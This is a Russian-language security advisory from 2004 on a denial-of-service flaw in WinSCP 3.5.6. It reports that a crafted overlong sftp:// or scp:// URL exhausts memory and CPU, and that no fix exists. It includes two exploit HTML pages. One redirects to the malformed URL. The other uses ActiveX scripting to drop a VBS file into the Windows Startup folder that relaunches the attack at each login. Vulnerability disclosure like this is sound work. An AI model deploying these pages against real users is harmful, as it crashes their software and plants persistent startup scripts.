Дата публикации: | 18.04.2004 |
Всего просмотров: | 1479 |
Опасность: | Высокая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: WinSCP 3.5.6
Описание: Уязвимость обнаружена в WinSCP. Удаленный пользователь может аварийно завершить работу программы. Удаленный пользователь может создать специальн обработанный 'sftp://' или 'scp://' URL, который, когда будет загружен, заставит WinSCP использовать всю доступную памать и ресурсы процессора. Пример/Эксплоит: <HTML> <HEAD> <TITLE>WinSCP DoS</TITLE> <meta http-equiv="Refresh" content="0; URL=sftp://AAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"> </HEAD> <BODY> </BODY> </HTML> -------- WinSCP_DoS2.html ------- <html> <head> <title>WinSCP DoS</title> <script language="JScript"> var WshShell = new ActiveXObject("WScript.Shell"); strSU = WshShell.SpecialFolders("StartUp"); var fso = new ActiveXObject("Scripting.FileSystemObject"); var vibas = fso.CreateTextFile(strSU + "\\WinSCPDoS.vbs",true); vibas.WriteLine("Dim shell"); vibas.WriteLine("Dim quote"); vibas.WriteLine("Dim DoS"); vibas.WriteLine("Dim param"); vibas.WriteLine("DoS = \"C:\\Programmi\\WinSCP3\\WinSCP3.exe\""); vibas.WriteLine("param = \"scp://AAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\""); vibas.WriteLine("set shell = WScript.CreateObject(\"WScript.Shell\")"); vibas.WriteLine("quote = Chr(34)"); vibas.WriteLine("pgm = \"explorer\""); vibas.WriteLine("shell.Run quote & DoS & quote & \" \" & param" ); vibas.Close(); </script> </head> </html> URL производителя:http://winscp.sourceforge.net/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | WinSCP Denial of Service |